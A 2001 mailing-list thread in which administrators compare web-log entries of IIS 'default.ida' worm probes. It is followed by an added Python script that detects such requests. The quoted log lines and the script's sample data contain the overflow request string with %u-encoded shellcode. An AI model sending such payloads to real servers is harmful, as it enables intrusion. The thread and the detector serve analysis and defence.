On Thu, Jul 19, 2001 at 04:51:51PM -0500, Florin Iucha wrote:
> On Thu, Jul 19, 2001 at 11:37:13PM +0200, Thomas Eibner wrote:
> > On Thu, Jul 19, 2001 at 05:28:52PM -0400, Dan Drake wrote:
> > > On Thu, Jul 19, 2001 at 11:23:27PM +0200, Thomas Eibner wrote:
> > > > On Thu, Jul 19, 2001 at 09:16:42PM +0000, kblack at isd.net wrote:
> > > > > Is anybody else running a firewall
> > > > > (and blocking port 80)
> > > > > noticing an unusual number of attacks today?
> > >
> > > Hmmmm. I'm seeing a lot of weird requests for "default.ida" in my logs
> > > (I'm running a web server and not blocking port 80). The accesses look
> > > weird, too...from a bunch of different IPs. I also have "Malformed HTTP
> > > header" (or something like that) in my error log.
> >
> > 211.236.188.150 - - [19/Jul/2001:23:04:43 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 333 "-" "-"
> > ip44-137.asiaonline.net - - [19/Jul/2001:23:12:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 333 "-" "-"
> > 212.113.168.95 - - [19/Jul/2001:23:32:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 333 "-" "-"
> >
> > Like these I take it?
>
> The same here from these guys...

Yeah, tons more, and it seems somewhere my provider has a broken IIS box:
seugling.ne.mediaone.net

> 41A9 2BDE 8E11 F1C5 87A6 03EE 34B3 E075 3B90 DFE4

I ponder about this and tried some perl to decode it, but all I got was
crap, is there something about it? :)

--
Thomas Eibner <http://thomas.eibner.dk/>
DnsZone <http://dnszone.org/>
mod_pointer <http://stderr.net/mod_pointer>
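
Added example, not part of the original thread: a small Python filter that picks requests like the ones quoted above out of an Apache combined-format access log and counts them per source. The function names, the thresholds and the sample log lines are assumptions constructed for illustration; the sample hosts are documentation addresses.

```python
import re
from collections import Counter

# NCSA/Apache log line: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+')
# Traits of the quoted requests: an .ida target, a long run of one repeated
# filler character in the query string, and several %uXXXX escapes.
FILLER_RE = re.compile(r'(.)\1{63,}')      # 64+ repeats; threshold is an assumption
UESC_RE = re.compile(r'%u[0-9a-fA-F]{4}')

def classify(line):
    """Return (host, status, reasons) for a suspicious line, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    reasons = []
    if path.lower().endswith('.ida'):
        reasons.append('ida-target')
    if FILLER_RE.search(query):
        reasons.append('filler-run')
    if len(UESC_RE.findall(query)) >= 4:   # threshold is an assumption
        reasons.append('percent-u-escapes')
    # Require two traits so a plain request or a long legitimate query is not flagged.
    if len(reasons) < 2:
        return None
    return m.group('host'), int(m.group('status')), reasons

def summarize(lines):
    """Count suspicious requests per source host."""
    hits = Counter()
    for line in lines:
        result = classify(line)
        if result:
            hits[result[0]] += 1
    return hits

# Constructed sample input: same shape as the quoted log lines, not copied from them.
_PROBE = '/default.ida?' + 'N' * 224 + '%u9090%u6858%ucbd3%u7801%u9090%u00=a'
_TAIL = ' HTTP/1.0" 400 333 "-" "-"'
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jul/2001:23:04:43 +0200] "GET ' + _PROBE + _TAIL,
    'scanner.example.net - - [19/Jul/2001:23:12:21 +0200] "GET ' + _PROBE + _TAIL,
    '192.0.2.10 - - [19/Jul/2001:23:32:21 +0200] "GET ' + _PROBE + _TAIL,
    '198.51.100.7 - - [19/Jul/2001:23:33:02 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
    '198.51.100.8 - - [19/Jul/2001:23:34:10 +0200] "GET /default.ida HTTP/1.0" 404 210 "-" "-"',
]

if __name__ == '__main__':
    for host, count in summarize(SAMPLE_LOG).most_common():
        print(f'{count:5d}  {host}')
```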